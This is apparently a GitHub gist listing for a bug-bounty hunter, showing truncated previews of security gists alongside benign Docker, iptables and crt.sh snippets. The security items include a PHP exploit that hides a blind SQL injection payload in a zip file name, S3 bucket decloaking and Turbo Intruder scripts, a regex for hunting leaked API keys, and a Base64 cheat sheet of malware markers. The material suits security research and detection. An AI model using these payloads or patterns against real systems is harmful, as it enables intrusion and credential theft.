bbhunter / exploit.php

Created March 28, 2023 12:13 — forked from mcipekci/exploit.php

Exploiting SQL injection via unzipped file contents

	<?php
	// Prepare File
	$file = tempnam("/tmp", "zip");
	$zip = new ZipArchive();
	$zip->open($file, ZipArchive::OVERWRITE);
	// Add file name with SQLi payload
	$zip->addFromString("'+(CASE WHEN 1=".$_GET['value']." THEN 1 ELSE sleep(10) END)+'", "");
	// Close and send to the server
	$zip->close();
	$cf = new CURLFile($file);

bbhunter / Dockerfile

Created November 25, 2022 12:12 — forked from hopsoft/Dockerfile

Dockerize your Rails app

	FROM ruby:3.0-alpine

	RUN apk add --no-cache --update \
	ack \
	bash \
	build-base \
	curl \
	git \
	htop \
	less \

bbhunter / iptables-nat.md

Created November 20, 2022 15:35 — forked from DavidWittman/iptables-nat.md

iptables n'at

Source NAT

Source NAT changes the source address in IP header of a packet. It may also change the source port in the TCP/UDP headers. The typical usage is to change the a private (rfc1918) address/port into a public address/port for packets leaving your network. Available only in the POSTROUTING chain in iptables.

Syntax

iptables -t nat -A POSTROUTING -i eth1 -j SNAT --to-source 1.2.3.4[:port]

Example

bbhunter / crtsh.py

Created November 19, 2022 11:00 — forked from alt-glitch/crtsh.py

Sample script to query crt.sh for certificate transparency log data.

	import psycopg2


	class CertificateTransparencyLog:
	def __init__(self, base) -> None:
	self.conn = psycopg2.connect(
	host="crt.sh",
	database="certwatch",
	user="guest",
	port="5432"

bbhunter / pd_docker_pipeline.sh

Created October 17, 2022 13:24 — forked from FLX-0x00/pd_docker_pipeline.sh

projectdiscovery tools docker pipeline with domain name as input

	#!/bin/bash

	# first parameter is passed to subfinder as the target domain

	docker pull projectdiscovery/nuclei
	docker pull projectdiscovery/httpx
	docker pull projectdiscovery/naabu
	docker pull projectdiscovery/dnsx
	docker pull projectdiscovery/subfinder
	docker pull projectdiscovery/notify

bbhunter / bucket-disclose.sh

Created October 12, 2022 09:23 — forked from jhaddix/bucket-disclose.sh

Using error messages to decloak an S3 bucket. Uses soap, unicode, post, multipart, streaming and index listing as ways of figure it out. You do need a valid aws-key (never the secret) to properly get the error messages

	#!/bin/bash

	# Written by Frans Rosén (twitter.com/fransrosen)
	_debug="$2" #turn on debug
	_timeout="20"
	#you need a valid key, since the errors happens after it validates that the key exist. we do not need the secret key, only access key
	_aws_key="AKIA..."
	H_ACCEPT="accept-language: en-US,en;q=0.9,sv;q=0.8,zh-TW;q=0.7,zh;q=0.6,fi;q=0.5,it;q=0.4,de;q=0.3"
	H_AGENT="user-agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.146 Safari/537.36"

bbhunter / MutateMethods.py

Created May 28, 2022 17:41 — forked from defparam/MutateMethods.py

Example of using Turbo Intruder in a "listen and attack" mode. Because turbo intruder's jython interpreter is technically inside burp you can have turbo intruder scripts use the plugin API. Here we use burp.IProxyListener to intercept requests and reissue them inside turbo intruder mutating the method.

	import time

	class TrafficMagnet(burp.IProxyListener):
	def __init__(self, engine):
	callbacks.registerProxyListener(self)
	self._engine = engine
	self._target = str(self._engine.engine.getTarget()).lower().replace("https:","").replace("http:","").replace("/","").split(':')[0]

	def listen(self):
	while True:

bbhunter / Generic keys

Created May 9, 2022 15:39 — forked from h4x0r-dz/Generic keys

(?i)((access_key|access_token|admin_pass|admin_user|algolia_admin_key|algolia_api_key|alias_pass|alicloud_access_key|amazon_secret_access_key|amazonaws|ansible_vault_password|aos_key|api_key|api_key_secret|api_key_sid|api_secret|api.googlemaps AIza|apidocs|apikey|apiSecret|app_debug|app_id|app_key|app_log_level|app_secret|appkey|appkeysecret|application_key|appsecret|appspot|auth_token|authorizationToken|authsecret|aws_access|aws_access_key_id|aws_bucket|aws_key|aws_secret|aws_secret_key|aws_token|AWSSecretKey|b2_app_key|bashrc password|bintray_apikey|bintray_gpg_password|bintray_key|bintraykey|bluemix_api_key|bluemix_pass|browserstack_access_key|bucket_password|bucketeer_aws_access_key_id|bucketeer_aws_secret_access_key|built_branch_deploy_key|bx_password|cache_driver|cache_s3_secret_key|cattle_access_key|cattle_secret_key|certificate_password|ci_deploy_password|client_secret|client_zpk_secret_key|clojars_password|cloud_api_key|cloud_watch_aws_access_key|cloudant_password|cloudflare_api_key|cloudflare_auth_k

bbhunter / Base64_CheatSheet.md

Created March 14, 2022 12:39 — forked from Neo23x0/Base64_CheatSheet.md

Learning Aid - Top Base64 Encodings Table

Base64 Code	Mnemonic Aid	Decoded*	Description
`JAB`	🗣 Jabber	`$.`	Variable declaration (UTF-16)
`TVq`	📺 Television	`MZ`	MZ header
`SUVY`	🚙 SUV	`IEX`	PowerShell Invoke Expression
`SQBFAF`	🐣 Squab favorite	`I.E.`	PowerShell Invoke Expression (UTF-16)
`SQBuAH`	🐣 Squab uahhh	`I.n.`	PowerShell Invoke string (UTF-16) e.g. `Invoke-Mimikatz`
`PAA`	💪 "Pah!"	`<.`	Often used by Emotet (UTF-16)

bbhunter / cli.php

Created March 1, 2022 11:03 — forked from PinkDraconian/cli.php

Can you spot the vulnerability?

	<?php
	if (!isset($_SERVER['argc']) \|\| $_SERVER['argc'] < 1) {
	die("Usage: cli <action> <options>");
	}
	$argc = $_SERVER['argc'];
	$argv = $_SERVER['argv'];

	switch ($argv[1]) {
	case "ls":
	echo "Listing directory";